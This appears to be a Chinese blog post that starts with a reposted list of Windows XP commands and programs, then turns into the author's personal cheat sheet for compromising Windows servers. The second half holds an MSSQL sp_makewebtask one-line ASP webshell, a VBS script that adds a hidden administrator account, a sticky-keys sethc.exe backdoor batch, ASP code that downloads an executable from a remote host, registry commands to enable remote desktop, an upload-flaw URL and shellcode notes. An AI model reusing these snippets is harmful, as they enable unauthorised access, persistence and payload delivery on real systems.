Windows一些常用命令&程序

转自http://www.cnscn.org/htm_data/571/0808/15947.html
有些感觉还是挺有用，先留着。

gpedit.msc－－－－－--------------------组策略

sndrec32－－－－－－－------------------录音机

nslookup－－－－－－－------------------ip地址侦测器

explorer－－－－－－－------------------打开资源管理器

logoff－－－－－－－－------------------注销命令

tsshutdn－－－－－－－------------------60秒倒计时关机命令

lusrmgr.msc－－－－---------------------本机用户和组

services.msc－－－----------------------本地服务设置

oobe/msoobe /a－－－－------------------检查xp是否激活

notepad－－－－－－－-------------------打开记事本

cleanmgr－－－－－－－------------------垃圾整理

net start messenger－－－－-------------开始信使服务

compmgmt.msc－－－----------------------计算机管理0

net stop messenger－－－－－------------停止信使服务

conf－－－－－－－－－－－--------------启动

dvdplay－－－－－－－－-----------------dvd播放器

charmap－－－－－－－－-----------------启动字符映射表

diskmgmt.msc－－－----------------------磁盘管理实用程序

calc－－－－－－－－－－－--------------启动计算器

dfrg.msc－－－－－－－------------------磁盘碎片整理程序

devmgmt.msc－－－ ----------------------设备管理器

regsvr32 /u *.dll－－－－---------------停止dll文件运行

drwtsn32－－－－－－ -------------------系统医生

rononce －p －－－－--------------------15秒关机

dxdiag－－－－－－－－－----------------检查directx信息

regedt32－－－－－－－------------------注册表编辑器

msconfig.exe－－－----------------------系统配置实用程序

rsop.msc－－－－－－－------------------组策略结果集

mem.exe－－－－－－－－-----------------显示内存使用情况

regedit.exe－－－－---------------------注册表

winchat－－－－－－－－-----------------xp自带局域网聊天

progman－－－－－－－－-----------------程序管理器

winmsd－－－－－－－－－----------------系统信息

perfmon.msc－－－－---------------------计算机性能监测程序

winver－－－－－－－－－----------------检查windows版本

sfc /scannow－－－－－------------------扫描错误并复原

winver－－－－－－－－－----------------检查windows版本

wmimgmt.msc－－－－---------------------打开windows管理体系结构

wupdmgr－－－－－－－－-----------------windows更新程序

w脚本－－－－－－－－-------------------windows脚本宿主设置

write－－－－－－－－－－---------------写字板

winmsd－－－－－－－－－----------------系统信息

wiaacmgr－－－－－－－------------------扫描仪和照相机向导

winchat－－－－－－－－-----------------xp自带局域网聊天

mem.exe－－－－－－－－-----------------显示内存使用情况

msconfig.exe－－－----------------------系统配置实用程序

mplayer2－－－－－－－------------------简易

mspaint－－－－－－－－-----------------画图板

mstsc－－－－－－－－－－---------------远程桌面连接

mplayer2－－－－－－－------------------媒体播放机

magnify－－－－－－－－-----------------放大镜实用程序

mmc－－－－－－－－－－－－-------------打开控制台

mobsync－－－－－－－－-----------------同步命令

dxdiag－－－－－－－－－----------------检查directx信息

drwtsn32－－－－－－------------------- 系统医生

devmgmt.msc－－－ ----------------------设备管理器

dfrg.msc－－－－－－－------------------磁盘碎片整理程序

diskmgmt.msc－－－----------------------磁盘管理实用程序

dcomcnfg－－－－－－－------------------打开系统组件服务

ddeshare－－－－－－－------------------打开dde共享设置

dvdplay－－－－－－－－-----------------dvd播放器

net stop messenger－－－－－------------停止信使服务

net start messenger－－－－-------------开始信使服务

ntbackup－－－－－－－------------------系统备份和还原

narrator－－－－－－－------------------屏幕"讲述人"

nyessmgr.msc－－－－---------------------移动存储管理器

nyessoprq.msc－－－----------------------移动存储管理员操作请求

netstat －an－－－－--------------------(tc)命令检查接口

syncapp－－－－－－－－-----------------创建一个公文包

sysedit－－－－－－－－-----------------系统配置编辑器

sigverif－－－－－－－------------------文件签名验证程序

sndrec32－－－－－－－------------------录音机

shrpubw－－－－－－－－-----------------创建共享文件夹

secpol.msc－－－－－====================本地安全策略

syskey－－－－－－－－－================系统加密，一旦加密就不能解开，保护windows xp系统的双重密码

sndvol32－－－－－－－==================音量控制程序

sfc.exe－－－－－－－－=================系统文件检查器

tsshutdn－－－－－－－==================60秒倒计时关机命令

tourstart－－－－－－===================xp简介（安装完成后出现的漫游xp程序）

taskmgr－－－－－－－－=================任务管理器

eventvwr－－－－－－－==================事件查看器

eudcedit－－－－－－－==================造字程序

packager－－－－－－－==================对象包装程序

perfmon.msc－－－－=====================计算机性能监测程序

progman－－－－－－－－=================程序管理器

regedit.exe－－－－=====================注册表

rsop.msc－－－－－－－==================组策略结果集

regedt32－－－－－－－==================注册表编辑器

rononce －p －－－－====================15秒关机

regsvr32 /u *.dll－－－－===============停止dll文件运行

regsvr32 /u zipfldr.dll－－－－－－=====取消zip支持

chkdsk.exe－－－－－====================chkdsk磁盘检查

ceryesgr.msc－－－－=====================证书管理实用程序

charmap－－－－－－－－=================启动字符映射表

cliconfg－－－－－－－==================sql server 客户端网络实用程序

clipbrd－－－－－－－－=================剪贴板查看器

conf－－－－－－－－－－－==============启动

compmgmt.msc－－－======================计算机管理

cleanmgr－－－－－－－==================垃圾整理

ciadv.msc－－－－－－===================索引服务程序

osk－－－－－－－－－－－－=============打开屏幕键盘

odbcad32－－－－－－－==================odbc数据源管理器

oobe/msoobe /a－－－－==================检查xp是否激活

lusrmgr.msc－－－－=====================本机用户和组

logoff－－－－－－－－－================注销命令

iexpress－－－－－－－==================木马捆绑工具，系统自带

nslookup－－－－－－－==================ip地址侦测器

fsmgmt.msc－－－－－====================共享文件夹管理器

utilman－－－－－－－－=================辅助工具管理器

汇编代码中构造字符串之顺序问题

一般用于ShellCode编写等。
主要是构造字符串时顺序问题很烦人，贴两个例子上来，方便以后用到的时候查询。

以构造字符串"ABCD1234零魂"为例

PUSH EBP
MOV EBP,ESP
SUB ESP,0AH
MOV DWORD PTR [EBP-10H],0x44434241 //0x DCBA
MOV DWORD PTR [EBP-0CH],0x34333231 //0x 4321
MOV DWORD PTR [EBP-08H],0xEABBE3C1 //0x 反序0xC1E3BBEA就是"零魂"
MOV DWORD PTR [EBP-04H],0x0 //字符串结束
LEA EAX,[EBP-10H] //EAX=ADDR OF "ABCD1234零魂"


PUSH EBP
MOV EBP,ESP
PUSH 0xEABBE3C1//0x 反序0xC1E3BBEA就是"零魂"
PUSH 0x34333231//0x 4321
PUSH 0x44434241//0x DCBA
MOV EAX,ESP //EAX=ADDR OF "ABCD1234零魂"

一些常见可执行目录

目的很明白，用于自己上传cmd运行命令，呵呵。

C:\WINDOWS\Temp
C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\Temporary ASP.NET Files
C:\Program Files\Common Files
C:\PHP\EXT(依情况而定)
MySQL的Bin目录
PHP session.save_path
PHP upload_tmp_dir
当前网站上传图片目录

待续....

MSSQL SA用sp_makewebtask写一句话

exec sp_makewebtask 'f:\wwwroot\shell1.asp','select''<% execute(request("#"))%>'''

暂时还未测试..

雷驰系统上传漏洞URL

http://www.xxx.com/admin/uploadpic.asp?actionType=mod&picName=myDiy.asp

无net.exe添加账户的VBS

//下面内容保存成.VBS文件直接双击运行即可
//user:zerosoul
//pass:12345678

set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","zerosoul")
od.SetPassword "12345678"
od.SetInfo
Set of=GetObject(os&"/zerosoul",user)
oe.add os&"/zerosoul"

Cmd粘滞键后门批处理

这个批处理手动写过太多遍了.....每次使用前都要写一遍，虽然简单，但写的有点烦了，所以也贴上来，以后直接copy.....

del /q /f %systemroot%\system32\dllcache\sethc.exe
del /q /f %systemroot%\system32\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
copy /y %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe

ASP下载文件代码

注意保存路径要可写

<%

Set xPost = CreateObject("Microsoft.XMLHTTP")

xPost.Open "GET","http://www.xxx.com/mm.exe",0

xPost.Send()

Set sGet = CreateObject("ADODB.Stream")

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile "c:\mm.exe",2

%>

2003不重启命令行开3389

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

终端连接超限情况下强制进入:

mstsc /console /v:220.215.88.99

IIS 写权限原理

无法查看这则摘要。请 点击此处查看博文。